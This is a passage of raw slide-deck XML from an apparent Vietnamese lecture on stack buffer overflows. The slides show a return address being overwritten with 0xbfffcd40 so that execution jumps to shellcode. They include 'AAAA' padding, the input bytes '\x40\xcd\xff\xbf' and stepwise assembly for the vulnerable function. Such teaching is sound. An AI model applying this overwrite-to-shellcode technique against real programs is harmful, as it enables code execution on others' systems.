                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5007170"/>
            <a:ext cx="4724400" cy="1169521"/>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Giá trị RIP (giá trị này sẽ khôi phục cho con trỏ EIP khi hàm trả về để trỏ tới lệnh tiếp theo được thực thi) bị ghi đè bởi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0xbfffcd40</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, do đó RIP trỏ tới ô nhớ đầu tiên chứa shellcode</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC3E25E-5E7B-1877-9A69-BC2A7CEDCAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8617410" y="3810000"/>
            <a:ext cx="221790" cy="1828800"/>
            <a:chOff x="8617409" y="4038600"/>
            <a:chExt cx="374191" cy="1828800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE6286-EAC1-6B2B-57C1-F1699B88A4ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="4038600"/>
              <a:ext cx="374191"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A37E64-B7A8-9A6A-8783-71256B015FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8991600" y="4038600"/>
              <a:ext cx="0" cy="18288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C12422-E585-2142-A100-5DD0C0E53BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="5867400"/>
              <a:ext cx="362723"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 name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E73DAC-C4D1-EB2B-09AC-B52915FE2F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2968919987"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393355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Hệ quả</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6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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addl $4, %esp</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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2293522" y="3121264"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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54EE3765-ABD0-7FE9-02A1-A562E263BA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="5486400"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>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18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8B358C-11E1-C8C3-48F1-6BF0CBA28F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="3960932"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>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320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3503731"/>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923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="26766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Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5007170"/>
            <a:ext cx="4724400" cy="430857"/>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Trả về từ hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1"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gets</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: dịch ESP lên 4 byte</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC3E25E-5E7B-1877-9A69-BC2A7CEDCAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8617410" y="3810000"/>
            <a:ext cx="221790" cy="1828800"/>
            <a:chOff x="8617409" y="4038600"/>
            <a:chExt cx="374191" cy="1828800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE6286-EAC1-6B2B-57C1-F1699B88A4ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="4038600"/>
              <a:ext cx="374191"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A37E64-B7A8-9A6A-8783-71256B015FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8991600" y="4038600"/>
              <a:ext cx="0" cy="18288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C12422-E585-2142-A100-5DD0C0E53BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="5867400"/>
              <a:ext cx="362723"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Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFC198A-7321-B3B0-7DEC-459CF800788E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3388605529"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925250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Ví dụ</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>addl $4, %esp</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movl %ebp, %esp</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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2291840" y="3326244"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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54EE3765-ABD0-7FE9-02A1-A562E263BA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4376395" y="3960932"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>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18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8B358C-11E1-C8C3-48F1-6BF0CBA28F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="3960932"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>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320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3503731"/>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923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="26766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Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5007170"/>
            <a:ext cx="4724400" cy="430857"/>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Kết thúc hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1"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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: dịch ESP tới EBP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC3E25E-5E7B-1877-9A69-BC2A7CEDCAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8617410" y="3810000"/>
            <a:ext cx="221790" cy="1828800"/>
            <a:chOff x="8617409" y="4038600"/>
            <a:chExt cx="374191" cy="1828800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE6286-EAC1-6B2B-57C1-F1699B88A4ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="4038600"/>
              <a:ext cx="374191"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A37E64-B7A8-9A6A-8783-71256B015FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8991600" y="4038600"/>
              <a:ext cx="0" cy="18288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C12422-E585-2142-A100-5DD0C0E53BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="5867400"/>
              <a:ext cx="362723"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Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47778BC-443A-F7FF-A6CD-B00D7A88AC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
